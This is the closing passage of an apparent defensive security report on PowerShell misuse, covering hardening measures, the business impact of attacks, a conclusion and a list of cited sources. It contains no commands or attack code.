●       Just Enough Administration (JEA): Implementing JEA allows administrators to delegate specific administrative tasks to non-administrative users using PowerShell, limiting the scope of their access and the potential for misuse.

●       Enable Script Block Logging: As highlighted earlier, enabling script block logging is crucial for recording the content of all PowerShell scripts and commands executed on a system.¹⁴ This provides valuable forensic data in case of an incident.

●       Enable Module Logging: Module logging tracks the use of PowerShell modules, helping identify suspicious or unauthorized module usage.

●       Configure Execution Policies: While often bypassable, configuring PowerShell execution policies can provide a basic level of control over which scripts can be run on a system.

●       Remove Unnecessary PowerShell Versions: If older versions of PowerShell are not required, consider removing them as they might have known vulnerabilities.

Implementing these hardening techniques requires a balanced approach to ensure security without hindering legitimate administrative tasks [Insight 27]. Organizations should carefully evaluate their specific needs and risks when implementing these measures.

8. Potential Impact Analysis

A successful attack involving one or more of these PowerShell commands on a public-facing network can have severe consequences:

●       Data Breaches: Attackers could use these commands to gain unauthorized access to sensitive data, either directly or as a stepping stone to deploying data exfiltration tools.

●       Service Disruption (Denial of Service): Stopping critical services can render the public-facing network unavailable, causing significant business impact and reputational damage.²³

●       Reputational Damage: A successful cyberattack can lead to negative publicity and a loss of customer trust.

●       Financial Losses: The costs associated with a cyberattack can include incident response, recovery efforts, legal fees, regulatory fines, and lost business.

●       Lateral Movement and Further Compromise: Initial access gained through exploiting one vulnerability and leveraging these PowerShell commands can lead to further compromise of internal systems.

●       Persistence of Attack: Commands used for establishing persistence can allow attackers to maintain a foothold in the network for extended periods, potentially leading to repeated attacks or long-term data theft.

The impact of a successful attack can be cascading, starting with a seemingly minor intrusion and escalating to significant damage over time [Insight 28]. Early detection and effective response are crucial to minimizing the potential consequences.

9. Conclusion

The ten PowerShell commands analyzed in this report represent powerful tools that, while essential for legitimate system administration, can be readily misused by attackers targeting public-facing networks. Understanding the legitimate uses and the potential for malicious exploitation of each command is paramount for security professionals. The ability of attackers to combine these commands in sophisticated attack sequences to conduct reconnaissance, gain initial access, execute malicious code, establish persistence, move laterally, and ultimately achieve their objectives poses a significant risk. To mitigate these risks, organizations must adopt a proactive and layered security approach that includes comprehensive logging and auditing of PowerShell activity, continuous monitoring for suspicious behavior, the implementation of PowerShell environment hardening techniques, robust security awareness training for users, and the deployment of appropriate security tools like SIEM and EDR solutions. Vigilance and a thorough understanding of attacker tactics are essential in defending against the ever-evolving threat landscape involving the misuse of powerful administrative tools like PowerShell.

Works cited

1.     Get-WmiObject (Microsoft.PowerShell.Management), accessed April 27, 2025, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1

2.     Win32_Process - powershell.one, accessed April 27, 2025, https://powershell.one/wmi/root/cimv2/win32_process

3.     WIN32_PROCESS class for Powershell command Get-WmiObject - Super User, accessed April 27, 2025, https://superuser.com/questions/1252764/win32-process-class-for-powershell-command-get-wmiobject

4.     Windows Management Instrumentation (WMI) Guide: Understanding WMI Attacks, accessed April 27, 2025, https://www.varonis.com/blog/wmi-windows-management-instrumentation

5.     How do I find out command line arguments of a running program? - Super User, accessed April 27, 2025, https://superuser.com/questions/415360/how-do-i-find-out-command-line-arguments-of-a-running-program

6.     Process Report : r/PowerShell - Reddit, accessed April 27, 2025, https://www.reddit.com/r/PowerShell/comments/hf04jx/process_report/

7.     Use PowerShell and WMI to Get Processor Information - Scripting Blog [archived], accessed April 27, 2025, https://devblogs.microsoft.com/scripting/use-powershell-and-wmi-to-get-processor-information/

8.     Is there a general situation where you would always want to use Get-WMIobject? - Reddit, accessed April 27, 2025, https://www.reddit.com/r/PowerShell/comments/7cfje2/is_there_a_general_situation_where_you_would/

9.     Why is Get-WMIObject Win32_Process in Powershell so slow and what are the alternatives?, accessed April 27, 2025, https://stackoverflow.com/questions/45226455/why-is-get-wmiobject-win32-process-in-powershell-so-slow-and-what-are-the-altern

10.  How can I determine whether an Antivirus product is installed? - Server Fault, accessed April 27, 2025, https://serverfault.com/questions/12343/how-can-i-determine-whether-an-antivirus-product-is-installed

11.  WMI Malware: The Complete Forensics Guide - Cyber Triage, accessed April 27, 2025, https://www.cybertriage.com/blog/wmi-malware/

12.  How to Track Malicious Processes with PowerShell - YouTube, accessed April 27, 2025, https://www.youtube.com/watch?v=M625dLdZqbQ

13.  Windows Management Instrumentation, Technique T1047 - Enterprise | MITRE ATT&CK®, accessed April 27, 2025, https://attack.mitre.org/techniques/T1047/

14.  Windows Management Instrumentation & Impacket's WMIexec | Red Canary, accessed April 27, 2025, https://redcanary.com/threat-detection-report/techniques/windows-management-instrumentation/

15.  How to Use the Get-Service cmdlet in PowerShell? - SharePoint Diary, accessed April 27, 2025, https://www.sharepointdiary.com/2022/04/how-to-use-powershell-get-service-cmdlet.html

16.  Get-Service (Microsoft.PowerShell.Management), accessed April 27, 2025, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-service?view=powershell-7.5

17.  Managing services - PowerShell | Microsoft Learn, accessed April 27, 2025, https://learn.microsoft.com/en-us/powershell/scripting/samples/managing-services?view=powershell-7.5

18.  How to Disable the Microsoft Defender Antivirus Service - Process Street, accessed April 27, 2025, https://www.process.st/how-to/disable-microsoft-defender-antivirus-service/

19.  Script to (temporarily) disable Windows Defender - Reddit, accessed April 27, 2025, https://www.reddit.com/r/scripting/comments/11k3zv0/script_to_temporarily_disable_windows_defender/

20.  How to disable the Security Center from services? - Microsoft Community, accessed April 27, 2025, https://answers.microsoft.com/en-us/windows/forum/all/how-to-disable-the-security-center-from-services/864d6d21-05b4-4d55-bfcd-59ffdb27ee98

21.  PowerShell script to stop services and change the startup type to disabled., accessed April 27, 2025, https://community.revenera.com/s/article/PowerShell-script-to-stop-services-and-change-the-startup-type-to-disabled

22.  How to find, stop and disable a Windows service using Powershell - Stack Overflow, accessed April 27, 2025, https://stackoverflow.com/questions/58508481/how-to-find-stop-and-disable-a-windows-service-using-powershell

23.  What Is a Denial of Service (DoS) Attack? - Palo Alto Networks, accessed April 27, 2025, https://www.paloaltonetworks.com/cyberpedia/what-is-a-denial-of-service-attack-dos

24.  Different Types of Network Attacks & How to Mitigate Them - Netmaker, accessed April 27, 2025, https://www.netmaker.io/resources/network-attacks

25.  An intro into abusing and identifying WMI Event Subscriptions for persistence - In.security, accessed April 27, 2025, https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/

26.  THE INCREASED USE OF POWERSHELL IN ATTACKS - Support Documents and Downloads, accessed April 27, 2025, https://docs.broadcom.com/docs/increased-use-of-powershell-in-attacks-16-en

27.  Does legitimate tech support use remote control software?, accessed April 27, 2025, https://security.stackexchange.com/questions/234160/does-legitimate-tech-support-use-remote-control-software

28.  Windows Suspicious Process | InsightIDR Documentation - Docs @ Rapid7, accessed April 27, 2025, https://docs.rapid7.com/insightidr/windows-suspicious-process/

29.  SANS Digital Forensics and Incident Response Blog | Investigating WMI Attacks, accessed April 27, 2025, https://www.sans.org/blog/investigating-wmi-attacks/

30.  Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor - Black Hat, accessed April 27, 2025, https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf

31.  8 Common Types of Cyber Attack Vectors and How to Avoid Them | Balbix, accessed April 27, 2025, https://www.balbix.com/insights/attack-vectors-and-breach-methods/

32.  How To Prevent Wireless Network Attacks - PurpleSec, accessed April 27, 2025, https://purplesec.us/learn/wireless-network-attack/